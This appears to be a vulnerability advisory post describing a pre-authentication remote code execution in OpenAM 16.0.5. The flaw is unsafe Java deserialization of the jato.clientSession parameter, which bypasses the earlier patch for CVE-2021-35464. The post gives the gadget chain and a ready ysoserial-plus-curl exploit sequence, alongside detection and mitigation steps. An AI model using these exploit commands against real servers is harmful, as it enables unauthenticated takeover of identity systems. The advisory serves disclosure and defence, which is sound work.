OpenIdentityPlatform OpenAM, Pre-auth RCE Bypass, (CVE pending) (Critical)

Listen to this Post

How the mentioned CVE works (CVE-2021-35464 bypass via jato.clientSession):
The original CVE-2021-35464 exploited unsafe deserialization of the `jato.pageSession` parameter. OpenAM patched it by adding `WhitelistObjectInputStream` to filter ~40 safe classes. However, the JATO framework contains a second deserialization entry point: jato.clientSession. This parameter is processed by `ClientSession.deserializeAttributes()` → `Encoder.deserialize()` → `ApplicationObjectInputStream.readObject()` with no whitelist. An unauthenticated attacker sends a Base64‑encoded malicious Java serialized object as the `jato.clientSession` GET/POST parameter to any JATO ViewBean endpoint whose JSP contains `` tags (e.g., Password Reset pages). During JSP rendering, `getClientSession()` → `hasAttributes()` → `getEncodedString()` → `isValid()` → `ensureAttributes()` → `deserializeAttributes()` triggers deserialization. The gadget chain uses PriorityQueue, Column$ColumnComparator, `TemplatesImpl` (from xalan) to load attacker‑supplied bytecode, finally executing Runtime.getRuntime().exec(cmd). No authentication required. Tested on OpenAM 16.0.5 with Tomcat 10.1.52 and Java 21.

DailyCVE form:

Platform: OpenIdentityPlatform OpenAM
Version: 16.0.5 (earlier likely)
Vulnerability: Pre‑auth RCE
Severity: Critical
Date: 2026-04-07

Prediction: Patch expected 90 days

What Undercode Say:

Check for vulnerable jato.clientSession parameter
curl -v 'https://target/openam/passwordReset?jato.clientSession=AAAA' --path-as-is
Identify JATO endpoints with <jato:form>
grep -r "jato:form" /path/to/openam/webapps/
JVM deserialization filter (defense)
JAVA_OPTS="$JAVA_OPTS -Djdk.serialFilter=!"
Monitor logs for deserialization exceptions
tail -f /var/log/tomcat/catalina.out | grep -i "deserial"

Exploit:

Generate payload using ysoserial with TemplatesImpl gadget
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/pwned" | base64 | tr -d '\n' > payload.b64
Send exploit to vulnerable endpoint
curl -X POST 'https://target/openam/passwordReset' \
--data "jato.clientSession=$(cat payload.b64)" \
-H "Content-Type: application/x-www-form-urlencoded"

Protection from this CVE:

  • Apply `WhitelistObjectInputStream` to `ClientSession.deserializeAttributes()` matching the patch for CVE-2021-35464.
  • Set JVM‑wide deserialization filter: `-Djdk.serialFilter=!org.apache.xalan.;!com.sun.org.apache.xalan.;!org.springframework.`
    – Remove or restrict access to JATO endpoints (e.g., block /passwordReset, `/login` if not needed).
  • Upgrade to patched version once available (watch OpenIdentityPlatform releases).

Impact:

  • Pre‑authentication arbitrary command execution as the Tomcat/application user.
  • Full server takeover, lateral movement, credential theft, data exfiltration.
  • Affects all OpenAM deployments with accessible `` pages (default password reset, registration).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top